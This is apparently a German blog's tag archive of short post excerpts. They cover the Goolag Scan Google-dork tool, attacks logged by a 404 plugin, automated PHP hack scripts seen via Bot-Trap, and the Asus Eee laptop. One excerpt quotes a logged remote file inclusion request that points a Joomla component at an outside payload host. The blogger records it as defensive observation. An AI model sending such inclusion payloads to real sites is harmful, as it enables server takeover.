Tag Archives: hack

Goolag Scan – Serversicherheit überprüfen

Die Hackergruppe “Cult of the Dead Cow” hat mit dem Tool GoolagScan (goolag.org) die Möglichkeit geschaffen, bequem und übersichtlich mit ein paar Google-Such-Tricks Schwachstellen im eigenen Server festzustellen. Dies klappt natürlich für jeden Server welcher öffentlich zugänglich ist.

Die Ersteller distanzieren sich nochmals vom Nutzen des Programms durch den Einzelnen und weisen darauf hin, dass man von Google bei Übermäßiger Nutzung gesperrt werden kann.

Das Programm wurde von Kaspersky zwar als Schädling “Hack Tool Win32.Scanner.g” erkannt, was jedoch unbeachtet werden kann. Denn hier wird nur darauf verwiesen, dass es sich aufgrund der Programmeigenschaften um ein Hacker Tool in Form eines Scanners für Windows handelt. Man kann mit über 1500 Such-Pattern Probleme und Schwachstellen ganz automatisiert feststellen. Continue reading

Sicherheitsrisiken einer Homepage durch automatisierte Angriffe

Derzeit habe ich ein Plugin laufen, welches mir jeden “Fehltritt” eines Besuchers speichert und ausgibt. Ursprünglich setzt es automatisch und manuell Weiterleitungen von nicht mehr existenten Seiten auf ausgewählte oder eben die richtige neue Seite.

Wenn dann ein Link ins leere läuft und einen 404-Error-Code erzeugt werden alle Informationen in eine Liste geschrieben. Schöner Nebeneffekt ist, dass ich aufgrund meiner Infrastruktur der Links auch gleichzeitig jeden versuchten PHP-Angriff sehe.

Das Ganze sieht dann in etwa so aus:

http://www.webregard.de/components/ com_mp3_allopass/allopass.php?osConfig_live_site= http://$$$$$$.com.cn/zhuanti/dkp/02.txt?

Ich habe mir mal die Mühe gemacht und die ganzen Attacken via SQL zusammenzufassen und auszugeben, dabei kommen folgende Ergebnisse raus welche eine schöne Übersicht gibt: Continue reading

Wo setzen automatisierte Hack-Scripts an?

Mit Hilfe des Bot-Trap Projektes ist es mir möglich einen kleinen Blick auf das automatisierte Vorgehen von Hackern zu werfen. Dabei ist auf Anhieb zu sehen, dass diese natürlich auf quell-offene Anwendungen setzen. Beliebt sind Blogs und Foren.

Zusätzlich gehe ich davon aus, dass ein Teil der Angriffe gar nicht gestartet wird. Entweder ist es nicht ersichtlich um welche Webanwendung es sich bei meiner Domain handelt, da geblockt durch Bot-Trap oder dass die derzeitige Automatisierung nicht für WordPress ausgelegt ist und gleich “weiter geht”.

Dennoch konnte ich eine gewisse Anzahl versuchter Angriffe in den letzten 30 Tagen verzeichnen. Sollte eine Injektion von fremden Code funktionieren, versucht der Großteil über einfache PHP-Scripte erstmal die Server-Eigenschaften auszuspionieren. Der kleinere Teil legt gleich mit voll ausgebauten PHP-Scripten los, welche zB. von Kaspersky sofort als “Trojan program Backdoor.PHP.Small.o” oder ähnlichem markiert werden.

Ein Diagramm mit den Anteilen verschiedener Methoden:
Continue reading

Smarter Laptop Asus Eee – Preiskracher

[UPDATE] Man hört schon überall von ihm, er soll klein, schick und schlau sein. Das mit dem schlau stimmt natürlich nicht, aber mit einer Größe von nur 22,6 x 16,4 x 3,7 cm ist er sehr kompakt. Das Mini-Notebook kommt mit einer angepassten Linux Version daher, welche alle alltäglichen Arbeiten unterstützt.

eepc.jpg

Man kann zum Beispiel mit dem Firefox surfen, seine E-Mails abrufen, mit seinen Freunden chatten, Notizen verfassen und Filme anschauen. Er beinhaltet eine SATA-Festplatte mit 4 GB, USB-Anschlüsse, SD/MCC-Reader, WLAN und einiges mehr. Continue reading